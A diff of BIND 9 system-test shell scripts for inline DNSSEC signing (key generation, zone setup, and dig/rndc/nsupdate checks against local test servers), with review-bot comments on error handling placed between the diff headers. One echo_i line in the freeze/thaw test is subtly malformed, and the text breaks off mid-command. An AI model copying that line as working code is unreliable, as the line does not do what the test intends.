+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+for zone in example01.com example02.com example03.com example04.com \
+ example05.com example06.com example07.com example08.com \
+ example09.com example10.com example11.com example12.com \
+ example13.com example14.com example15.com example16.com
+do
+ rm -f K${zone}.+*+*.key
+ rm -f K${zone}.+*+*.private
+ keyname=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone $zone)
+ keyname=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone -f KSK $zone)
+ cp example.com.db.in ${zone}.db
+ $SIGNER -S -T 3600 -O raw -L 2000042407 -o ${zone} ${zone}.db > /dev/null 2>&1
+done
+
+for zone in example unsigned-serial-test; do
+ rm -f K${zone}.+*+*.key
+ rm -f K${zone}.+*+*.private
+ keyname=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone $zone)
+ keyname=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone -f KSK $zone)
+ cp example.db.in ${zone}.db
+done
diff --git a/bin/tests/system/inline/setup.sh b/bin/tests/system/inline/setup.sh
new file mode 100644
index 0000000..b31606c
--- /dev/null
+++ b/bin/tests/system/inline/setup.sh
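Review bot: In the first loop of ns8/sign.sh the `$SIGNER` call ends in `> /dev/null 2>&1`, which discards stderr, so when signing one of the sixteen zones fails the `-e` shell exits without any diagnostic. Dropping the stderr redirect keeps the failure reason visible while still silencing normal output: `$SIGNER -S -T 3600 -O raw -L 2000042407 -o ${zone} ${zone}.db > /dev/null`. The second loop generates keys for `example` and `unsigned-serial-test` but does not sign them; if that is intentional, a comment such as `# left unsigned on purpose; named signs these on load` would say so, with the wording adjusted to the real reason.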
@@ -0,0 +1,57 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+cp ns1/root.db.in ns1/root.db
+
+touch ns2/trusted.conf
+cp ns2/nsec3-loop.db.in ns2/nsec3-loop.db
+cp ns2/bits.db.in ns2/bits.db
+cp ns2/bits.db.in ns2/inactiveksk.db
+cp ns2/bits.db.in ns2/inactivezsk.db
+cp ns2/bits.db.in ns2/nokeys.db
+cp ns2/bits.db.in ns2/removedkeys-secondary.db
+cp ns2/bits.db.in ns2/retransfer.db
+cp ns2/bits.db.in ns2/retransfer3.db
+
+cp ns3/master.db.in ns3/master.db
+cp ns3/master.db.in ns3/dynamic.db
+cp ns3/master.db.in ns3/updated.db
+cp ns3/master.db.in ns3/unsupported.db
+cp ns3/master.db.in ns3/expired.db
+cp ns3/master.db.in ns3/nsec3.db
+cp ns3/master.db.in ns3/externalkey.db
+cp ns3/master.db.in ns3/delayedkeys.db
+cp ns3/master.db.in ns3/removedkeys-primary.db
+cp ns3/include.db.in ns3/include.db
+
+mkdir ns3/removedkeys
+
+touch ns4/trusted.conf
+cp ns4/noixfr.db.in ns4/noixfr.db
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.pre ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+copy_setports ns8/named.conf.in ns8/named.conf
+
+(cd ns3; $SHELL -e sign.sh)
+(cd ns1; $SHELL -e sign.sh)
+(cd ns7; $SHELL -e sign.sh)
+(cd ns8; $SHELL -e sign.sh)
diff --git a/bin/tests/system/inline/tests.sh b/bin/tests/system/inline/tests.sh
new file mode 100755
index 0000000..2242d79
--- /dev/null
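Review bot: The four subshells that end setup.sh, `(cd ns3; $SHELL -e sign.sh)` and its ns1/ns7/ns8 siblings, join `cd` and the script with `;`, and this file runs under plain `#!/bin/sh`, so only the ns8 subshell's status becomes the script's exit status. A key-generation or signing failure in ns3, ns1 or ns7 therefore goes unreported at setup time and would only surface later as unrelated-looking test failures. I would write each as `(cd ns3 && $SHELL -e sign.sh) || exit 1`. The `cp` and `copy_setports` lines above are unchecked in the same way, and `mkdir ns3/removedkeys` fails on a re-run unless the directory was cleaned first, so `mkdir -p ns3/removedkeys` is safer. How the harness treats setup.sh's exit status is not visible in this diff.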
+++ b/bin/tests/system/inline/tests.sh 
@@ -0,0 +1,1488 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +dnssec -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +dig_with_opts() { + $DIG $DIGOPTS "$@" +} + +rndccmd() { + $RNDCCMD "$@" +} + +wait_for_serial() ( + $DIG $DIGOPTS "@$1" "$2" SOA > "$4" + serial=$(awk '$4 == "SOA" { print $7 }' "$4") + [ "$3" -eq "${serial:--1}" ] +) + +status=0 +n=0 + +$RNDCCMD 10.53.0.3 signing -nsec3param 1 0 0 - nsec3 > /dev/null 2>&1 + +for i in 1 2 3 4 5 6 7 8 9 0 +do + nsec3param=$($DIG $DIGOPTS +nodnssec +short @10.53.0.3 nsec3param nsec3.) + test "$nsec3param" = "1 0 0 -" && break + sleep 1 +done + +n=$((n + 1)) +echo_i "checking that an unsupported algorithm is not used for signing ($n)" +ret=0 +grep -q "algorithm is unsupported" ns3/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that rrsigs are replaced with ksk only ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 axfr nsec3. 
| + awk '/RRSIG NSEC3/ {a[$1]++} END { for (i in a) {if (a[i] != 1) exit (1)}}' || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that the zone is signed on initial transfer ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $RNDCCMD 10.53.0.3 signing -list bits > signing.out.test$n 2>&1 + keys=$(grep '^Done signing' signing.out.test$n | wc -l) + [ $keys = 2 ] || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking expired signatures are updated on load ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 +noall +answer +dnssec expired SOA > dig.out.ns3.test$n +expiry=$(awk '$4 == "RRSIG" { print $9 }' dig.out.ns3.test$n) +[ "$expiry" = "20110101000000" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking removal of private type record via 'rndc signing -clear' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -list bits > signing.out.test$n 2>&1 +keys=$(sed -n -e 's/Done signing with key \(.*\)$/\1/p' signing.out.test$n) +for key in $keys; do + $RNDCCMD 10.53.0.3 signing -clear ${key} bits > /dev/null || ret=1 + break; # We only want to remove 1 record for now. 
+done 2>&1 |sed 's/^/ns3 /' | cat_i + +for i in 1 2 3 4 5 6 7 8 9 10 +do + ans=0 + $RNDCCMD 10.53.0.3 signing -list bits > signing.out.test$n 2>&1 + num=$(grep "Done signing with" signing.out.test$n | wc -l) + [ $num = 1 ] && break + sleep 1 +done +[ $ans = 0 ] || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking private type was properly signed ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.6 bits TYPE65534 > dig.out.ns6.test$n +grep "ANSWER: 2," dig.out.ns6.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns6.test$n > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking removal of remaining private type record via 'rndc signing -clear all' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -clear all bits > /dev/null || ret=1 + +for i in 1 2 3 4 5 6 7 8 9 10 +do + ans=0 + $RNDCCMD 10.53.0.3 signing -list bits > signing.out.test$n 2>&1 + grep "No signing records found" signing.out.test$n > /dev/null || ans=1 + [ $ans = 1 ] || break + sleep 1 +done +[ $ans = 0 ] || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking negative private type response was properly signed ($n)" +ret=0 +sleep 1 +$DIG $DIGOPTS @10.53.0.6 bits TYPE65534 > dig.out.ns6.test$n +grep "status: NOERROR" dig.out.ns6.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns6.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns6.test$n > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone bits +server 10.53.0.2 ${PORT} +update add added.bits 0 A 1.2.3.4 +send +EOF + +n=$((n + 1)) +echo_i "checking that the record is added on the hidden primary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 added.bits A > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +if [ 
$ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that update has been transferred and has been signed ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 added.bits A > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone bits +server 10.53.0.2 ${PORT} +update add bits 0 SOA ns2.bits. . 2011072400 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072400) serial on hidden primary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 bits SOA > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2011072400" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072400) serial in signed zone ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 bits SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072400" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that the zone is signed on initial transfer, noixfr ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $RNDCCMD 10.53.0.3 signing -list noixfr > signing.out.test$n 2>&1 + keys=$(grep '^Done signing' signing.out.test$n | wc -l) + [ $keys = 2 ] || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + 
+$NSUPDATE << EOF +zone noixfr +server 10.53.0.4 ${PORT} +update add added.noixfr 0 A 1.2.3.4 +send +EOF + +n=$((n + 1)) +echo_i "checking that the record is added on the hidden primary, noixfr ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.4 added.noixfr A > dig.out.ns4.test$n +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that update has been transferred and has been signed, noixfr ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 added.noixfr A > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone noixfr +server 10.53.0.4 ${PORT} +update add noixfr 0 SOA ns4.noixfr. . 
2011072400 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072400) serial on hidden primary, noixfr ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.4 noixfr SOA > dig.out.ns4.test$n +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +grep "2011072400" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072400) serial in signed zone, noixfr ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 noixfr SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072400" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that the primary zone signed on initial load ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $RNDCCMD 10.53.0.3 signing -list master > signing.out.test$n 2>&1 + keys=$(grep '^Done signing' signing.out.test$n | wc -l) + [ $keys = 2 ] || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking removal of private type record via 'rndc signing -clear' (primary) ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -list master > signing.out.test$n 2>&1 +keys=$(sed -n -e 's/Done signing with key \(.*\)$/\1/p' signing.out.test$n) +for key in $keys; do + $RNDCCMD 10.53.0.3 signing -clear ${key} master > /dev/null || ret=1 + break; # We only want to remove 1 record for now. 
+done 2>&1 |sed 's/^/ns3 /' | cat_i + +for i in 1 2 3 4 5 6 7 8 9 +do + ans=0 + $RNDCCMD 10.53.0.3 signing -list master > signing.out.test$n 2>&1 + num=$(grep "Done signing with" signing.out.test$n | wc -l) + [ $num = 1 ] && break + sleep 1 +done +[ $ans = 0 ] || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking private type was properly signed (primary) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.6 master TYPE65534 > dig.out.ns6.test$n +grep "ANSWER: 2," dig.out.ns6.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns6.test$n > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking removal of remaining private type record via 'rndc signing -clear' (primary) ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -clear all master > /dev/null || ret=1 +for i in 1 2 3 4 5 6 7 8 9 10 +do + ans=0 + $RNDCCMD 10.53.0.3 signing -list master > signing.out.test$n 2>&1 + grep "No signing records found" signing.out.test$n > /dev/null || ans=1 + [ $ans = 1 ] || break + sleep 1 +done +[ $ans = 0 ] || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check adding of record to unsigned primary ($n)" +ret=0 +cp ns3/master2.db.in ns3/master.db +rndc_reload ns3 10.53.0.3 master +for i in 1 2 3 4 5 6 7 8 9 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 e.master A > dig.out.ns3.test$n + grep "10.0.0.5" dig.out.ns3.test$n > /dev/null || ans=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ans=1 + [ $ans = 1 ] || break + sleep 1 +done +[ $ans = 0 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check adding record fails when SOA serial not changed ($n)" +ret=0 +echo "c A 10.0.0.3" >> ns3/master.db +rndc_reload ns3 10.53.0.3 +sleep 1 +$DIG $DIGOPTS @10.53.0.3 c.master A > dig.out.ns3.test$n +grep "NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 
]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check adding record works after updating SOA serial ($n)" +ret=0 +cp ns3/master3.db.in ns3/master.db +$RNDCCMD 10.53.0.3 reload master 2>&1 | sed 's/^/ns3 /' | cat_i +for i in 1 2 3 4 5 6 7 8 9 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 c.master A > dig.out.ns3.test$n + grep "10.0.0.3" dig.out.ns3.test$n > /dev/null || ans=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ans=1 + [ $ans = 1 ] || break + sleep 1 +done +[ $ans = 0 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check the added record was properly signed ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 e.master A > dig.out.ns6.test$n +grep "10.0.0.5" dig.out.ns6.test$n > /dev/null || ans=1 +grep "ANSWER: 2," dig.out.ns6.test$n > /dev/null || ans=1 +grep "flags:.* ad[ ;]" dig.out.ns6.test$n > /dev/null || ans=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that the dynamic primary zone signed on initial load ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $RNDCCMD 10.53.0.3 signing -list dynamic > signing.out.test$n 2>&1 + keys=$(grep '^Done signing' signing.out.test$n | wc -l) + [ $keys = 2 ] || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking primary zone that was updated while offline is correct ($n)" +ret=0 +$DIG $DIGOPTS +nodnssec +short @10.53.0.3 updated SOA >dig.out.ns2.soa.test$n +serial=$(awk '{print $3}' dig.out.ns2.soa.test$n) +# serial should have changed +[ "$serial" = "2000042407" ] && ret=1 +# e.updated should exist and should be signed +$DIG $DIGOPTS @10.53.0.3 e.updated A > dig.out.ns3.test$n +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 +# updated.db.signed.jnl should exist, should have the source serial 
+# of master2.db, and should show a minimal diff: no more than 8 added +# records (SOA/RRSIG, 2 x NSEC/RRSIG, A/RRSIG), and 4 removed records +# (SOA/RRSIG, NSEC/RRSIG). +$JOURNALPRINT ns3/updated.db.signed.jnl >journalprint.out.test$n +serial=$(awk '/Source serial =/ {print $4}' journalprint.out.test$n) +[ "$serial" = "2000042408" ] || ret=1 +diffsize=$(wc -l < journalprint.out.test$n) +[ "$diffsize" -le 13 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking adding of record to unsigned primary using UPDATE ($n)" +ret=0 + +[ -f ns3/dynamic.db.jnl ] && { ret=1 ; echo_i "journal exists (pretest)" ; } + +$NSUPDATE << EOF +zone dynamic +server 10.53.0.3 ${PORT} +update add e.dynamic 0 A 1.2.3.4 +send +EOF + +[ -f ns3/dynamic.db.jnl ] || { ret=1 ; echo_i "journal does not exist (posttest)" ; } + +for i in 1 2 3 4 5 6 7 8 9 10 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 e.dynamic > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ans=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ans=1 + grep "1.2.3.4" dig.out.ns3.test$n > /dev/null || ans=1 + [ $ans = 0 ] && break + sleep 1 +done +[ $ans = 0 ] || { ret=1; echo_i "signed record not found"; cat dig.out.ns3.test$n ; } + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "stop bump in the wire signer server ($n)" +ret=0 +stop_server ns3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "restart bump in the wire signer server ($n)" +ret=0 +start_server --noclean --restart --port ${PORT} ns3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone bits +server 10.53.0.2 ${PORT} +update add bits 0 SOA ns2.bits. . 
2011072450 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072450) serial on hidden primary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 bits SOA > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2011072450" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072450) serial in signed zone ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 bits SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072450" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone noixfr +server 10.53.0.4 ${PORT} +update add noixfr 0 SOA ns4.noixfr. . 
2011072450 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072450) serial on hidden primary, noixfr ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.4 noixfr SOA > dig.out.ns4.test$n +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +grep "2011072450" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072450) serial in signed zone, noixfr ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 noixfr SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072450" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone bits +server 10.53.0.3 ${PORT} +update add bits 0 SOA ns2.bits. . 
2011072460 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking forwarded update on hidden primary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 bits SOA > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2011072460" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking forwarded update on signed zone ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 bits SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072460" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone noixfr +server 10.53.0.3 ${PORT} +update add noixfr 0 SOA ns4.noixfr. . 
2011072460 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking forwarded update on hidden primary, noixfr ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.4 noixfr SOA > dig.out.ns4.test$n +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +grep "2011072460" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking forwarded update on signed zone, noixfr ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 noixfr SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072460" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +ret=0 +n=$((n + 1)) +echo_i "checking turning on of inline signing in a secondary zone via reload ($n)" +$DIG $DIGOPTS @10.53.0.5 +dnssec bits SOA > dig.out.ns5.test$n +grep "status: NOERROR" dig.out.ns5.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns5.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "setup broken"; fi +status=$((status + ret)) +copy_setports ns5/named.conf.post ns5/named.conf +(cd ns5; $KEYGEN -q -a ${DEFAULT_ALGORITHM} bits) > /dev/null 2>&1 +(cd ns5; $KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK bits) > /dev/null 2>&1 +rndc_reload ns5 10.53.0.5 +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.5 bits SOA > dig.out.ns5.test$n + grep "status: NOERROR" dig.out.ns5.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns5.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking rndc freeze/thaw of dynamic inline zone no change ($n)" +ret=0 +$RNDCCMD 10.53.0.3 freeze dynamic > 
freeze.test$n 2>&1 || { echo_i "/' < freeze.test$n"; ret=1; } +sleep 1 +$RNDCCMD 10.53.0.3 thaw dynamic > thaw.test$n 2>&1 || { echo_i "rndc thaw dynamic failed" ; ret=1; } +sleep 1 +grep "zone dynamic/IN (unsigned): ixfr-from-differences: unchanged" ns3/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + + +n=$((n + 1)) +echo_i "checking rndc freeze/thaw of dynamic inline zone ($n)" +ret=0 +$RNDCCMD 10.53.0.3 freeze dynamic > freeze.test$n 2>&1 || ret=1 +sleep 1 +awk '$2 == ";" && $3 ~ /serial/ { printf("%d %s %s\n", $1 + 1, $2, $3); next; } + { print; } + END { print "freeze1.dynamic. 0 TXT freeze1"; } ' ns3/dynamic.db > ns3/dynamic.db.new +mv ns3/dynamic.db.new ns3/dynamic.db +$RNDCCMD 10.53.0.3 thaw dynamic > thaw.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check added record freeze1.dynamic ($n)" +for i in 1 2 3 4 5 6 7 8 9 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 freeze1.dynamic TXT > dig.out.ns3.test$n + grep 